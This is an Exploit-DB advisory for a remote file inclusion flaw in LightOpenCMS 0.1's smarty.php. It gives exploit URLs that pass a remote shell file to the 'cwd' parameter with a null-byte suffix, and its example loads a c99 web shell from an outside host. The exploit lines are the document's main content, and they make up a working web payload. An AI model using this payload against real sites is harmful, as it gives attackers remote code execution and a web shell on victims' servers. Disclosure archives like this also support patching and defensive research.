LightOpenCMS 0.1 - 'smarty.php' Remote File Inclusion

Author: Zer0 Thunder
type: webapps
platform: php
port: 
date_added: 2010-01-03  
date_updated:   
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comlocms-0.1-pa.zip  

raw file: 11003.txt  

# Exploit Title: LightOpen CMS Remote File Inclusion (smarty.php)
# Date: 2010-01-05
# Author: Zer0 Thunder
# Software Link: http://sourceforge.net/projects/lightopencms/
# Version: v0.1
# Tested on: Windows XP sp2 [Wamp]
# CVE :
# Code :

Exploit :
http://site.com/path/smarty.php?cwd=[shell.txt]?%00


Example :
http://localhost/locms/smarty.php?cwd=http://www.cfsm.cn/c99.txt?%00

########################################
# MSN : zer0_thunder@colombohackers.com
# Email : neonwarlock@live.com
# Site : LKHackers.com
# Greetz : To all my friends
# Note : Proud to be a Sri Lankan
########################################